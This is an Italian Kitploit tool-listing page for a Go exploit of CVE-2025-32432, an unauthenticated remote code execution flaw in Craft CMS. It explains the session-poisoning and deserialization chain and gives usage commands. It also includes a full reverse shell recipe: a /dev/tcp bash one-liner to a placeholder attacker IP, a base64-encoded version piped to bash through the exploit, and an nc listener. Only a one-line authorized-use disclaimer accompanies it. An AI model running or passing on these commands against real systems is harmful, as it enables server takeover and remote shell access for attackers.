Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32432 — Exploit RCE pre-autenticazione per Craft CMS in Go. Recupera il token di sessione/CSRF, corrompe la sessione PHP e attiva la deserializzazione per l'esecuzione di comandi o una reverse shell. | Kitploit
Strumenti/GitHubGitHub/heltonpojo/cve-2025-32432
Autenticazione e AutorizzazioneGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

Exploit RCE pre-autenticazione per Craft CMS in Go. Recupera il token di sessione/CSRF, corrompe la sessione PHP e attiva la deserializzazione per l'esecuzione di comandi o una reverse shell.

Vedi Repository
20 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32432 — Craft CMS Pre-Auth RCE

Exploit per l'esecuzione remota di codice senza autenticazione su Craft CMS, scritto in Go.
Ispirato al lavoro originale di c0gnit00.

Come funziona

  1. Ottiene la sessione PHP e il token CSRF tramite GET /admin/login
  2. Avvelena il file di sessione PHP iniettando codice PHP nella query string
  3. Innesca la deserializzazione tramite assets/generate-transform per includere ed eseguire il file avvelenato

Uso

root@kitploit:~
go run main.go -u <url> -c <comando> 
FlagDescrizioneObbligatorio
-uURL target (es: http://target.com)Sì
-cComando da eseguire (es: id, whoami)Sì

Esempio

root@kitploit:~
# Senza Asset ID (brute-force automatico)
go run main.go -u http://target.com -c whoami

Reverse Shell

1. Genera il payload in base64 con il tuo IP e la tua porta:

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. Apri il listener:

root@kitploit:~
nc -lvnp 4444

3. Esegui l'exploit con il payload:

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

Sostituisci il valore in base64 con quello generato al passo 1 con il tuo IP reale.

Avviso

Per uso esclusivo in ambienti autorizzati e test di sicurezza controllati.

Scarica lo strumento